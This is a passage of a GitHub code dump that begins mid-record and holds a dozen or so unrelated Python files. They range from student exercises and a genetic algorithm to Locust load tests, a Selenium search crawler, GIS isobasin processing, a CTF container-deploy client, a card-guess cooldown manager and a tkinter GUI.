=open(\"numere.txt\" ,'r')\r\nvariabil = [int(x) for x in readMe.readline().split()]\r\n\r\n\r\ndef min_max(*variabil):\r\n if variabil[1] >= variabil[0]:\r\n maxi = variabil[1]\r\n mini = variabil[0]\r\n else:\r\n maxi = variabil[0]\r\n mini = variabil[1]\r\n for elem in variabil:\r\n if elem > maxi:\r\n maxi = elem\r\n elif elem < mini:\r\n mini = elem\r\n return mini, maxi\r\n\r\nprint (min_max(variabil))\r\n\r\n\r\n\r\n\r\n# 3. (Tratarea excepțiilor)\r\n# a) Să se scrie o funcție “min_max” care primește un număr variabil de parametri (numere\r\n# naturale) și returnează cel mai mic și cel mai mare număr dintre cele primite ca parametri, dacă\r\n# există cel puțin un parametru și dacă toți parametrii sunt numere naturale, sau returnează None\r\n# altfel.\r\n# b) Să se citească tot conținutul fișierului text “numere.txt” și apoi să se afișeze pe ecran rezultatele\r\n# obținute aplicând funcția “min_max” asupra sa. Dacă valoarea returnată de funcția min_max este\r\n# diferită de None, se va scrie în fișierul text “impartire.txt” rezultatul împărțirii valorii maxime din\r\n# fișierul text la cea minimă. Să se trateze excepțiile care pot să apară: nu există fișierul text de\r\n# intrare, nu există drept de scriere pentru fișierul de ieșire, fișierul de intrare conține valori care nu\r\n# sunt numere naturale, împărțire la zero etc.\r\n# Exemplu: Dacă fișierul text “numere.txt” conține: 11 9 31 7 145 5 101 4 80, atunci funcția\r\n# “min_max” va returna (4, 145), iar în fișierul “impartire.txt” se va scrie: 36.25","repo_name":"Fusneica-FlorentinCristian/FMI-UniBuc","sub_path":"Anul-I/Sem-I/AF/Laborator/Coded/Lab4/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17652177402","text":"\"\"\"\nModulo para Algoritmo Genetico\n\"\"\"\n# -*- coding: utf-8 -*-\n\nfrom random import randint, random\nfrom operator import add\n\ndef individuo(tamanho, min, max):\n 'Cria um membro da populacao.'\n return [randint(min,max) for x in xrange(tamanho)]\n\ndef population(n_individuos, tamanho, min, max):\n \"\"\"\n Cria um numero de individuos\n\n count: numero de individuos na populacao\n length: numero de valores por individuos\n min: minimo possivel de individuos\n max: maximo possivel de individuos\n\n \"\"\"\n return [individuo(tamanho, min, max) for x in xrange(n_individuos) ]\n\ndef fitness(individuo, objetivo):\n \"\"\"\n Determina o fitness de um individuo. Quanto maior melhor.\n\n individuo: ---\n target: numero de individuos que se deseja obter\n \"\"\"\n sum = reduce(add, individuo, 0)\n return abs(objetivo-sum)\n\ndef grade(populacao, objetivo):\n 'Encontra o fitness medio da populacao'\n\n summed = reduce(add, (fitness(x, objetivo) for x in populacao))\n return summed / (len(populacao) * 1.0)\n\ndef evolve(pop, target, retain=0.2, random_select=0.05, mutate=0.01):\n graded = [(fitness(x, target), x) for x in pop]\n graded = [x[1] for x in sorted(graded)]\n retain_length = int(len(graded)*retain)\n parents = graded[:retain_length]\n\n # adiciona individuos aleatoriamente para promover diversidade genetica\n\n for individual in graded[retain_length:]:\n if random_select > random():\n parents.append(individual)\n # faz mutacao de alguns individuos\n for individual in parents:\n if mutate > random():\n pos_to_mutate = randint(0, len(individual)-1)\n individual[pos_to_mutate] = randint(\n min(individual), max(individual))\n\n # crossover dos pais\n parents_length = len(parents)\n desired_length = len(pop) - parents_length\n children = []\n while len(children) < desired_length:\n male = randint(0, parents_length-1)\n female = randint(0, parents_length-1)\n if male != female:\n male = parents[male]\n female = parents[female]\n half = len(male) / 2\n child = male[:half] + female[half:]\n children.append(child)\n parents.extend(children)\n return parents","repo_name":"imperiumzigna/alg_gen_trab","sub_path":"alggen/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20443770630","text":"import datetime\nfrom urllib.parse import quote\n\nimport chromedriver_binary\nfrom selenium import webdriver\n\n\ndef getDriver():\n chromeOptions = webdriver.ChromeOptions()\n chromeOptions.add_argument('--headless')\n chromeOptions.add_argument('--disable-gpu')\n chromeOptions.add_argument('--no-sandbox')\n driver = webdriver.Chrome(options=chromeOptions)\n driver.implicitly_wait(10)\n return driver\n\n\ndef crawl(driver, css, results):\n title_tags = driver.find_elements_by_css_selector(\"h3\")[:-1]\n a_tags = driver.find_elements_by_xpath(\"//a[h3]\")\n\n links = []\n titles = []\n for a_tag, title_tag in zip(a_tags, title_tags):\n links.append(a_tag.get_attribute(\"href\"))\n titles.append(title_tag.text)\n\n for link, title in zip(links, titles):\n result = [title, link]\n try:\n driver.get(link)\n for cs in css:\n try:\n result.append(driver.find_element_by_css_selector(cs).text)\n except:\n result.append(None)\n except:\n pass\n\n print(result)\n results.append(result)\n return results\n\n\ndef getTarget(kw, pages, css):\n driver = getDriver()\n results = []\n for page in range(pages):\n start = \"&start=\" + str(page * 10)\n url = 'https://www.google.com/search?q=' + quote(kw) + start\n driver.get(url)\n results = crawl(driver, css, results)\n\n driver.quit()\n return results\n\n\nif __name__ == '__main__':\n datas = getTarget('松 SEO', 2, ['h1'])\n print(datas)\n","repo_name":"kaiadachi/flask_vue","sub_path":"backend/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29332765459","text":"#Aprobación de créditos\ningreso = eval(input(\"ingreso:\"))\nanac = eval(input(\"año de nacimiento:\"))\nnhij = eval(input(\"numero de hijos:\"))\napertbanco = eval(input(\"años de pertenencia al banco:\"))\nestado = input(\"Estado civil (S: soltero, C: casado)\")\nlugar = input(\"Si vive en campo o ciudad (U: urbano, R: rural)\")\n\nif apertbanco > 10 or nhij > 2:\n print(\"APROBADO\")\nelif estado == 'C' or nhij > 3 or anac > 2020 - 45 and anac <=2020 - 55:\n print(\"APROBADO\")\nelif ingreso > 2500000 or estado == 'S' and lugar == 'U':\n print(\"APROBADO\")\nelif ingreso > 3500000 and apertbanco > 5:\n print(\"APROBADO\")\nelif lugar == 'R' or estado == 'C' and nhij < 2:\n print(\"APROBADO\")\nelse:\n print(\"REPROBADO\") ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_fafc029ad5f98b71ffb959c5470dc6e0.py","file_name":"hito1_ej3_fafc029ad5f98b71ffb959c5470dc6e0.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17060068122","text":"import os\nimport urllib.parse\n\nimport cairosvg\n\nfrom django.core.cache import cache\nfrom django.template import loader, Context\nfrom django.conf import settings\n\nfrom sorl.thumbnail import get_thumbnail\n\nfrom . import colors as col\nfrom .full_url import get_full_url\n\n\nAVATAR_SIZE_MIN = getattr(settings, 'AVATAR_SIZE_MIN', 20)\nAVATAR_SIZE_MAX = getattr(settings, 'AVATAR_SIZE_MAX', 200)\nAVATAR_SIZE_DEFAULT = getattr(settings, 'AVATAR_SIZE_DEFAULT', 120)\nAVATARS_URL = getattr(settings, 'AVATARS_URL', 'avatars')\nAVATAR_MAX_FILESIZE = getattr(settings, 'AVATAR_MAX_FILESIZE', 1 * 1024 * 1024) # 1 MB\n\nAVATARS_PATH = str(os.path.join(settings.MEDIA_URL, AVATARS_URL))\nAVATARS_ABS_PATH = str(os.path.join(settings.MEDIA_ROOT, AVATARS_URL))\n\nif not os.path.exists(AVATARS_ABS_PATH):\n os.makedirs(AVATARS_ABS_PATH)\n\n\ndef get_avatar(request, user, size=None, bg_shade=0):\n\n if size is None:\n size = AVATAR_SIZE_DEFAULT\n else:\n size = int(size)\n if AVATAR_SIZE_MAX < size < AVATAR_SIZE_MIN:\n size = AVATAR_SIZE_DEFAULT\n\n # use user-defined avatar\n if user.avatar:\n img = get_thumbnail(user.avatar.file, '%dx%d' % (size, size), crop='center', quality=90)\n return get_full_url(request, img.url)\n\n # user cached gravatar\n filename = cache_key = '{pk:08d}-{size:03d}-{bg:03d}.png'.format(\n size=size,\n pk=user.pk,\n bg=int(bg_shade * 100)\n )\n\n path = cache.get(cache_key)\n\n if not path:\n abs_path = os.path.join(AVATARS_ABS_PATH, filename)\n path = os.path.join(AVATARS_PATH, filename)\n\n if not os.path.isfile(abs_path):\n color = col.from_hex(user.hash[:6])\n\n template = loader.get_template('pickers/avatar.html')\n\n icon = template.render(Context({\n 'size': size,\n 'bg': color.complementary().shade(bg_shade).hexcode() if bg_shade else 0,\n 'color': color.hexcode(),\n }))\n\n with open(abs_path, 'wb') as f:\n f.write(cairosvg.svg2png(bytestring=icon))\n\n cache.set(cache_key, path)\n\n return 'https://secure.gravatar.com/avatar/{hash}?{params}'.format(\n hash=user.hash,\n params=urllib.parse.urlencode({\n 'd': get_full_url(request, path),\n 's': str(size),\n }),\n )\n","repo_name":"amir17688/google_data_p2","sub_path":"79144_avatar.py_C__Users_user_Desktop_data_2_data_google_data_jsmesami_naovoce_src_utils.py","file_name":"79144_avatar.py_C__Users_user_Desktop_data_2_data_google_data_jsmesami_naovoce_src_utils.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"26402981429","text":"import os\nimport glob\nimport whitebox\nimport argparse\nimport shutil\nimport geopandas as gpd\nfrom osgeo import ogr\nfrom tqdm import tqdm\nfrom utils import clean_temp\nwbt = whitebox.WhiteboxTools()\n\ndef split_polygon(input_shape, split_shape_output):\n fn = input_shape \n driver = ogr.GetDriverByName('ESRI Shapefile') # See OGR Vector Format for other options\n dataSource = driver.Open(fn)\n layer = dataSource.GetLayer()\n sr = layer.GetSpatialRef() # Spatial Reference\n dst = split_shape_output\n new_feat = ogr.Feature(layer.GetLayerDefn()) # Dummy feature\n\n for id, feat in enumerate(layer):\n new_ds = driver.CreateDataSource(r\"{}\\watershed_{}.shp\".format(dst, id))\n new_lyr = new_ds.CreateLayer('watershed_{}'.format(id), sr, ogr.wkbPolygon) \n geom = feat.geometry().Clone()\n new_feat.SetGeometry(geom)\n \n new_lyr.CreateFeature(new_feat)\n del new_ds, new_lyr\n\n\ndef buffer_basins(input_basin, buffered_basin):\n gdf = gpd.read_file(input_basin)\n gdf['geometry'] = gdf.geometry.buffer(0)\n gdf.to_file(buffered_basin)\n\ndef main(tempdir, dem, coastline, size, isobasins, split_isobasins):\n clean_temp.clean(tempdir)\n wbt.fill_missing_data(\n i = dem, \n output = tempdir + 'filledmissing.tif', \n filter=666, \n weight=2.0, \n no_edges=True\n ) \n\n wbt.breach_depressions(\n dem = tempdir + 'filledmissing.tif', \n output = tempdir + 'breached.tif', \n max_depth=None, \n max_length=None, \n flat_increment=0.001, \n fill_pits=True\n )\n\n wbt.isobasins(\n dem = tempdir + 'breached.tif', \n output = tempdir + 'isobasins.tif', \n size = size, \n connections=True\n )\n\n wbt.raster_to_vector_polygons(\n i = tempdir + 'isobasins.tif', \n output = tempdir + 'isobasins.shp'\n )\n\n wbt.erase(\n i = tempdir + 'isobasins.shp', \n erase = coastline, \n output = tempdir + 'erasedisobasins.shp'\n )\n # Isobasins are generated along the coast as well which\n # means that alot of small areas are created. Therefore polygons smaller than\n # 10 km2 were removed.\n gdf = gpd.read_file(tempdir + 'erasedisobasins.shp')\n gdf['geometry'].to_crs({'init': 'epsg:3006'})\n gdf['poly_area'] = gdf['geometry'].area/ 10**6\n gdf = gdf.loc[gdf['poly_area'] > 2] # 2 square km\n gdf.to_file(isobasins)\n\n \n print('explode isobasin shapefile')\n split_polygon(isobasins, tempdir)\n\n print('buffer isobasins')\n # A buffer of 0 is applied to correct topological errors.\n pathtoshapefiles = tempdir + '/*.shp'\n listofshapefiles = glob.glob(pathtoshapefiles)\n for basin in tqdm(listofshapefiles):\n if 'erasedisobasins' not in basin and 'isobasins' not in basin:\n \n bufferedbasin = split_isobasins + os.path.basename(basin)\n buffer_basins(basin, bufferedbasin)\n\n clean_temp.clean(tempdir)\n\n\nif __name__== '__main__':\n parser = argparse.ArgumentParser(\n description='Select the lidar tiles which contains training data',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('tempdir', help='path to ramdisk') \n parser.add_argument('dem', help='path to the directory of 50 m dem')\n parser.add_argument('coastline', help='path to a shapefile of the coastline')\n parser.add_argument('size', help='target size of isobasins in int values', type=int)\n parser.add_argument('isobasins', help='path to output isobasin shapefile')\n parser.add_argument('split_isobasins', help='path to output isobasin dir for split isobasins') \n args = vars(parser.parse_args())\n main(**args)","repo_name":"williamlidberg/Hydrologically-correct-DEM-from-LiDAR","sub_path":"create_isobasins.py","file_name":"create_isobasins.py","file_ext":"py","file_size_in_byte":3720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29347434029","text":"#Cálculo del dígito verificador de un rut\n\nprint(\"Hola! aquí conoceremos tú digito verificador. Comencemos!\")\nrut = input(\"Ingrese rut (sin puntos y sin en numero luego de guión): \")\n\nif (len(rut) == 8):\n a1 = int(rut[7])\n a2 = int(rut[6])\n a3 = int(rut[5])\n \n a4 = int(rut[4])\n a5 = int(rut[3])\n a6 = int(rut[2])\n\n a7 = int(rut[1])\n a8 = int(rut[0])\n\n b1 = (a1 * 2)\n b2 = (a2 * 3)\n b3 = (a3 * 4)\n\n b4 = (a4 * 5)\n b5 = (a5 * 6)\n b6 = (a6 * 7)\n\n b7 = (a7 * 2)\n b8 = (a8 * 3)\n\n r = (b1 + b2 + b3 + b4 + b5 + b6 + b7 + b8)\n\n r1 = (r//11)\n r2 = r - (11 * r1)\n r_f = 11 - r2\n\n frase1 = \"dv=\" + str(r_f)\n\n if (r_f == 11):\n print(\"dv=0\")\n\n elif (r_f == 10):\n print(\"dv=k\")\n\n else:\n print(frase1)\n\nelif (len(rut) == 7):\n a2 = int(rut[6])\n a3 = int(rut[5])\n \n a4 = int(rut[4])\n a5 = int(rut[3])\n a6 = int(rut[2])\n\n a7 = int(rut[1])\n a8 = int(rut[0])\n\n b2 = (a2 * 2)\n b3 = (a3 * 3)\n\n b4 = (a4 * 4)\n b5 = (a5 * 5)\n b6 = (a6 * 6)\n\n b7 = (a7 * 7)\n b8 = (a8 * 2)\n\n r = (b2 + b3 + b4 + b5 + b6 + b7 + b8)\n \n r1 = (r//11)\n r2 = r - (11 * r1)\n r_f = 11 - r2\n\n frase1 = \"dv=\" + str(r_f)\n \n if (r_f == 11):\n print(\"dv=0\")\n elif (r_f == 10):\n print(\"dv=k\")\n else:\n print(frase1)\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_f6ff858d5a715152089106430b9e5e5d.py","file_name":"hito1_ej5_f6ff858d5a715152089106430b9e5e5d.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43869902056","text":"import random\n\nfrom locust import TaskSet, HttpLocust, task\nfrom urllib.parse import urlencode\n\n\nclass ApiClientBehavior(TaskSet):\n \"\"\"\n The @task decorator declares a locust task.\n The argument passed the task decorator determines\n the relative frequency with which the task\n will be spawned within a swarm. For example\n a task with a relative frequency of 1 will be\n spawned half as often as a task with a\n relative frequency of 2.\n \"\"\"\n\n @task(1)\n def quick_check(self):\n self.client.get(\"/\", name='/', headers={\"Accept\": \"application/json\"})\n\n @task(2)\n def get_current(self):\n self.client.get(\"/current\", name='/current', headers={\"Accept\": \"application/json\"})\n\n @task(3)\n def predict_from_city_linear(self):\n cities = [\"paris,fr\", \"london,uk\", \"berlin,de\", \"beijing,cn\", \"stockholm,se\"]\n params = urlencode({'model': 'linear', 'city': random.choice(cities)})\n self.client.get(\"/predict_from_city?\" + params,\n name='/predict_from_city',\n headers={\"Accept\": \"application/json\"})\n\n @task(4)\n def predict_from_values_linear(self):\n params = urlencode({\n 'model': 'linear',\n 'temp_max': round(random.uniform(0.0, 100.0), 2),\n 'temp_min': round(random.uniform(0.0, 100.0), 2),\n 'pressure': round(random.uniform(0.0, 100.0), 2),\n 'humidity': round(random.uniform(0.0, 100.0), 2)\n })\n self.client.get(\"/predict_from_values?\" + params,\n name='/predict_from_values',\n headers={\"Accept\": \"application/json\"})\n\n @task(5)\n def predict_from_city_dnn(self):\n cities = [\"paris,fr\", \"london,uk\", \"berlin,de\", \"beijing,cn\", \"stockholm,se\"]\n params = urlencode({'model': 'dnn', 'city': random.choice(cities)})\n self.client.get(\"/predict_from_city?\" + params,\n name='/predict_from_city',\n headers={\"Accept\": \"application/json\"})\n\n @task(6)\n def predict_from_values_dnn(self):\n params = urlencode({\n 'model': 'dnn',\n 'temp_max': round(random.uniform(0.0, 100.0), 2),\n 'temp_min': round(random.uniform(0.0, 100.0), 2),\n 'pressure': round(random.uniform(0.0, 100.0), 2),\n 'humidity': round(random.uniform(0.0, 100.0), 2)\n })\n self.client.get(\"/predict_from_values?\" + params,\n name='/predict_from_values',\n headers={\"Accept\": \"application/json\"})\n\n\nclass ApiClient(HttpLocust):\n task_set = ApiClientBehavior\n\n # How long should a task wait after the batch\n # member is spawned before executing. This creates\n # randomness in the traffic patterns rather than\n # having every member of the batch try to execute\n # at once.\n min_wait = 1000\n max_wait = 5000\n","repo_name":"tfuntanilla/iot-weather","sub_path":"extras/locustfile.py","file_name":"locustfile.py","file_ext":"py","file_size_in_byte":2822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24862800480","text":"import os, time, threading, requests\n\nclass killThread(threading.Thread):\n def __init__(self, name):\n threading.Thread.__init__(self)\n self.name = name\n\n\n def run(self):\n count = 0\n while True:\n if count >= 30:\n for i in range(3):\n try:\n os.system(\"docker kill mc_realworld_client_\" + self.name)\n time.sleep(1)\n os.system(\"docker rm -f mc_realworld_client_\" + self.name)\n time.sleep(1)\n except:\n continue\n time.sleep(2)\n break\n count += 1\n time.sleep(1)\n\n\ndef deploy(name):\n os.system('./x11docker --env NAME=' + name + ' --env ADDR=134.175.230.10 --env PORT=4080 --name=mc_realworld_client_' + name + ' --user=root -- --network=de1ctf-mc-net -- mc_realworld_client &')\n time.sleep(5)\n thread = killThread(name)\n thread.start()\n\n\nurl = 'http://134.175.230.10:443/v2L4qFXhGU4AFiGv/deploy'\n\nwhile True:\n resp = 0\n try:\n resp = requests.get(url, timeout=3)\n except:\n time.sleep(1)\n continue\n pipe = resp.text\n print(pipe)\n if '\\n' in pipe:\n for i in pipe.split('\\n'):\n if len(i) == 12:\n print(time.time(), i)\n open('deploylog.txt', 'a').write(str(time.time()) + ' ' + i + '\\n')\n deploy(i)\n time.sleep(1)","repo_name":"impakho/de1ctf-mc_challs","sub_path":"docker/realworld/client/remote_deploy_client.py","file_name":"remote_deploy_client.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"1151225136","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\n\nhh1, mm1, ss1 = map(int, input().split(':'))\nhh2, mm2, ss2 = map(int, input().split(':'))\n\ntotal_ss1 = hh1*3600 + mm1*60 + ss1\ntotal_ss2 = hh2*3600 + mm2*60 + ss2\n\nif total_ss1 > total_ss2:\n total_ss2 += 86400\n\nres = total_ss2 - total_ss1\n\nprint(f'{res//3600:#02d}:{res%3600//60:#02d}:{res%3600%60:#02d}')","repo_name":"hjyoon/baekjoon-answers","sub_path":"_1000/1408.py","file_name":"1408.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39524215011","text":"import os\nimport random\nimport time\nfrom pathlib import Path\n\nimport nonebot\nfrom nonebot.log import logger\n\nfrom src.libraries.globalMessage import guess_sendwitchoutcd\n\ntry:\n import ujson as json\nexcept:\n logger.warning('ujson not find, import json instead')\n import json\n\n\n\nclass guessCardManager:\n def __init__(self) -> None:\n # 读取全局变量\n try:\n self.path = str(Path(nonebot.get_driver().config.ocg_bot_guess_cfg_path, 'ocg_bot_guess_cfg.json'))\n except:\n self.path = 'data/ocg_bot/ocg_bot_guess_cfg.json'\n self.guess_cd = 20\n self.guess_cd = self.guess_cd if self.guess_cd > 0 else 0\n # 读取perm_cfg\n self.ReadCfg()\n\n # --------------- 文件读写 开始 ---------------\n # 读取cfg\n def ReadCfg(self) -> dict:\n try:\n # 尝试读取\n with open(self.path, 'r', encoding='utf-8') as f:\n self.cfg = json.loads(f.read())\n return self.cfg\n except Exception as e:\n # 读取失败\n logger.warning(f'setu_perm_cfg.json 读取失败, 尝试重建\\n{e}')\n self.cfg = {}\n self.WriteCfg()\n return {}\n\n # 写入cfg\n def WriteCfg(self):\n # 尝试创建路径\n os.makedirs(self.path[:-18], mode=0o777, exist_ok=True)\n # 写入数据\n with open(self.path, 'w', encoding='utf-8') as f:\n f.write(json.dumps(self.cfg))\n\n # --------------- 文件读写 开始 ---------------\n\n # --------------- 查询系统 开始 ---------------\n # 查询上一次发送时间\n def ReadLastSend(self, sessionId):\n try:\n return self.cfg['last'][sessionId]\n except KeyError:\n return 0\n\n # 查询cd\n def ReadCd(self, group_sessionId):\n try:\n return self.cfg[group_sessionId]['cd']\n except KeyError:\n return self.guess_cd\n\n # 查询黑名单\n def ReadBanList(self, sessionId):\n try:\n return sessionId in self.cfg['ban']\n except KeyError:\n return False\n\n # --------------- 查询系统 结束 ---------------\n\n # --------------- 逻辑判断 开始 ---------------\n # 查询权限, 并返回修正过的参数\n def CheckPermission(self, sessionId: str,groupSession: str, userType: str = 'group'):\n if self.ReadBanList(groupSession):\n raise PermissionError(f'猜卡功能已关闭!')\n # 查询冷却时间\n if groupSession is None:\n timeLeft = self.ReadCd(sessionId) + self.ReadLastSend(sessionId) - time.time()\n else:\n timeLeft = self.ReadCd(groupSession) + self.ReadLastSend(sessionId) - time.time()\n if timeLeft > 0:\n hours, minutes, seconds = 0, 0, 0\n if timeLeft >= 60:\n minutes, seconds = divmod(timeLeft, 60)\n hours, minutes = divmod(minutes, 60)\n else:\n seconds = timeLeft\n cd_msg = f\"{str(round(hours)) + '小时' if hours else ''}{str(round(minutes)) + '分钟' if minutes else ''}{str(round(seconds, 3)) + '秒' if seconds else ''}\"\n raise PermissionError(f\"{random.choice(guess_sendwitchoutcd)} 你的CD还有{cd_msg}!\")\n # --------------- 逻辑判断 结束 ---------------\n\n # --------------- 冷却更新 开始 ---------------\n # 最后一次发送的记录\n def UpdateLastSend(self, sessionId):\n try:\n self.cfg['last'][sessionId] = time.time()\n except KeyError:\n self.cfg['last'] = {\n sessionId: time.time()\n }\n\n # --------------- 冷却更新 结束 ---------------\n\n # --------------- 增删系统 开始 ---------------\n\n # cd部分\n def UpdateCd(self, sessionId: str, cdTime: int):\n # 检查数据是否超出范围,超出则设定至范围内\n cdTime = cdTime if cdTime > 0 else 0\n # 读取原有数据\n try:\n cdTime_old = self.cfg[sessionId]['cd']\n except KeyError:\n cdTime_old = '未设定'\n # 写入新数据\n if sessionId not in self.cfg.keys():\n self.cfg[sessionId] = {}\n self.WriteCfg()\n self.cfg[sessionId]['cd'] = cdTime\n self.WriteCfg()\n # 返回信息\n return f'cd更新成功 {cdTime_old} -> {cdTime}'\n\n def UpdateBanList(self, sessionId: str, add_mode: bool):\n # 加入黑名单\n if add_mode:\n try:\n if sessionId in self.cfg['ban']:\n return f'功能已经关闭'\n except KeyError:\n self.cfg['ban'] = []\n self.cfg['ban'].append(sessionId)\n self.WriteCfg()\n return f'功能已经关闭'\n # 移出黑名单\n else:\n try:\n self.cfg['ban'].remove(sessionId)\n self.WriteCfg()\n return f'功能已经开启'\n except ValueError:\n return f'功能已经开启'\n # --------------- 增删系统 结束 ---------------\n","repo_name":"fireinsect/ocg-bot","sub_path":"src/libraries/guessManage.py","file_name":"guessManage.py","file_ext":"py","file_size_in_byte":5116,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"77"} +{"seq_id":"2717068754","text":"from collections import deque\n\nfrom collections import deque\n\n\nclass Solution:\n \"\"\"\n @param: nums: A list of integers\n @param: k: An integer\n @return: The maximum number inside the window at each moving\n \"\"\"\n\n def maxSlidingWindow(self, nums, k):\n if not nums or not k:\n return []\n\n dq = deque([])\n\n for i in range(k - 1):\n self.push(dq, nums, i)\n print('in first for, i =', i, \" dq = \", dq)\n\n result = []\n for i in range(k - 1, len(nums)):\n print('in second for, i =', i, \" dq = \", dq)\n self.push(dq, nums, i)\n result.append(dq[0])\n print(\"res.append:\",dq[0])\n if len(dq)==k:\n print(\"pop left\")\n dq.popleft()\n\n return result\n\n def push(self, dq, nums, i):\n while dq and dq[-1] < nums[i]:\n dq.pop()\n dq.append(nums[i])\n\ns = Solution()\nnums = [1,3,1,2,0,5]\nk = 3\nres = s.maxSlidingWindow(nums,k)\nprint(res)\n\n","repo_name":"ZhouXing-19/Algorithms","sub_path":"九章算法/Leetcode Excercise/Sliding Window Maximum.py","file_name":"Sliding Window Maximum.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33675226963","text":"from collections import defaultdict\nimport urllib, csv\n\ndef load_data_from_csv(csv_file, users_to_i = {}, items_to_i = {}):\n \"\"\"\n Loads data from a CSV file located at `csv_file` \n where each line is of the form:\n\n user_id_1, item_id_1\n ...\n user_id_n, item_id_n\n\n Initial mappings from user and item identifiers\n to integers can be passed using `users_to_i`\n and `items_to_i` respectively.\n\n This function will return a data array consisting\n of (user, item) tuples, a mapping from user ids to integers\n and a mapping from item ids to integers.\n \"\"\"\n raw_data = []\n with open(csv_file) as f:\n csvreader = csv.reader(f)\n for user, item in csvreader:\n raw_data.append((user, item))\n return load_data_from_array(raw_data, users_to_i, items_to_i)\n\ndef load_data_from_movielens(url, threshold, users_to_i = {}, items_to_i = {}):\n \"\"\"\n Loads movielens data from a URL, e.g.\n\n http://files.grouplens.org/datasets/movielens/ml-100k/\n\n Initial mappings from user and item identifiers\n to integers can be passed using `users_to_i`\n and `items_to_i` respectively.\n\n This function will return a data array consisting\n of (user, item) tuples, a mapping from user ids to integers\n and a mapping from item ids to integers.\n \"\"\"\n raw_data = []\n for line in urllib.urlopen(url).readlines():\n user, item, rating, timestamp = line.split('\\t')\n if int(rating) > threshold:\n raw_data.append((user, item))\n return load_data_from_array(raw_data)\n\ndef load_data_from_array(array, users_to_i = {}, items_to_i = {}):\n \"\"\"\n Loads data from an array of tuples of the form:\n\n (user_id, item_id)\n\n Initial mappings from user and item identifiers\n to integers can be passed using `users_to_i`\n and `items_to_i` respectively.\n\n This function will return a data array consisting\n of (user, item) tuples, a mapping from user ids to integers\n and a mapping from item ids to integers.\n \"\"\"\n data = []\n if len(users_to_i.values()) > 0:\n u = max(users_to_i.values()) + 1\n else:\n u = 0\n if len(items_to_i.values()) > 0:\n i = max(items_to_i.values()) + 1\n else:\n i = 0\n for user, item in array:\n if not users_to_i.has_key(user):\n users_to_i[user] = u\n u += 1\n if not items_to_i.has_key(item):\n items_to_i[item] = i\n i += 1\n data.append((users_to_i[user], items_to_i[item]))\n return data, users_to_i, items_to_i\n\n","repo_name":"bbc/theano-bpr","sub_path":"theano_bpr/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"77"} +{"seq_id":"25616134980","text":"import tkinter\nimport tkinter.messagebox\nimport customtkinter\nimport settings\n\n\ndef main():\n # список всех созданных кнопок\n buttons_list = []\n\n # отключить текущую кнопку, включить все другие в навигационном меню\n def disable_button(button):\n cur_fg_color = button.cget('fg_color')\n # возвращаем все кнопки в исходное, рабочее состояние\n [(bt.configure(state=customtkinter.NORMAL, fg_color=cur_fg_color)) for bt in buttons_list]\n # отключаем текущую нажатую кнопку и подсвечиваем, что выбран этот пункт меню\n button.configure(state=customtkinter.DISABLED, fg_color='#3b9e0d', text_color_disabled='#f6f5fa')\n\n def settings_button_pressed(button):\n disable_button(button)\n\n # Настройки темы\n customtkinter.set_appearance_mode(\"System\") # Темы: system (default), light, dark\n customtkinter.set_default_color_theme(\"blue\") # Темы тоже, расцветка: blue (default), dark-blue, green\n\n # Главное окно\n app = customtkinter.CTk() # создаем главное окно\n app.title('Simple File Transfer') # Заголовок окна\n app.iconbitmap('icon.ico')\n app.geometry(\"800x500\") # Размер окна\n app.resizable(False, False) # Нельзя менять размеры окна\n app.eval('tk::PlaceWindow . center') # Размещаем главное окно по центру экрана (на самом деле не совсем)\n\n # Левая навигационная панель, она же главная\n navigation_panel = customtkinter.CTkFrame(app)\n navigation_panel.pack(side=tkinter.LEFT)\n navigation_panel.configure(width=200, height=500)\n\n # Пункт меню, кнопка \"Передача файлов\"\n files_pg_button = customtkinter.CTkButton(master=navigation_panel, text='Передача файлов',\n command=lambda: settings_button_pressed(files_pg_button),\n font=('Bold', 20), bg_color='transparent')\n files_pg_button.place(relx=0.5, rely=0.1, anchor=customtkinter.CENTER)\n\n # Пункт меню, кнопка \"Настройки\"\n settings_pg_button = customtkinter.CTkButton(master=navigation_panel, text='Настройки',\n command=lambda: settings_button_pressed(settings_pg_button),\n font=('Bold', 20), bg_color='transparent')\n settings_pg_button.place(relx=0.5, rely=0.2, anchor=customtkinter.CENTER)\n\n buttons_list.extend([files_pg_button, settings_pg_button])\n\n # Так надо\n app.mainloop()\n\n\nif __name__ == '__main__':\n 